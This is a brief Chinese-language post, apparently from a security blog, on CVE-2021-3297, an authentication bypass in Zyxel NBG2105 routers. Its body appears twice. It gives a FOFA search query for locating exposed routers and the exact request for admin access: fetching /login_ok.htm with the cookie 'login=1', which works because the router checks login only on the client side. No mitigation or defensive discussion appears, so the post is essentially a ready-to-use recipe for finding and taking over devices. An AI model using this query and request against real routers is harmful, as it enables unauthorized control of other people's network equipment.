# CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞
Zyxel NBG2105
==FOFA==
app="ZyXEL-NBG2105"

/js/util_gw.js 存在前端對 Cookie login參數的校驗。home.htm頁面。http://xxx.xxx.xxx.xxx/login_ok.htm Cookie: login=1;

Zyxel NBG2105
==FOFA==
app="ZyXEL-NBG2105"

其中前端文件
/js/util_gw.js 存在前端對 Cookie login參數的校驗。請求如下則會以管理員身份跳轉到
home.htm頁面。http://xxx.xxx.xxx.xxx/login_ok.htm Cookie: login=1;

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容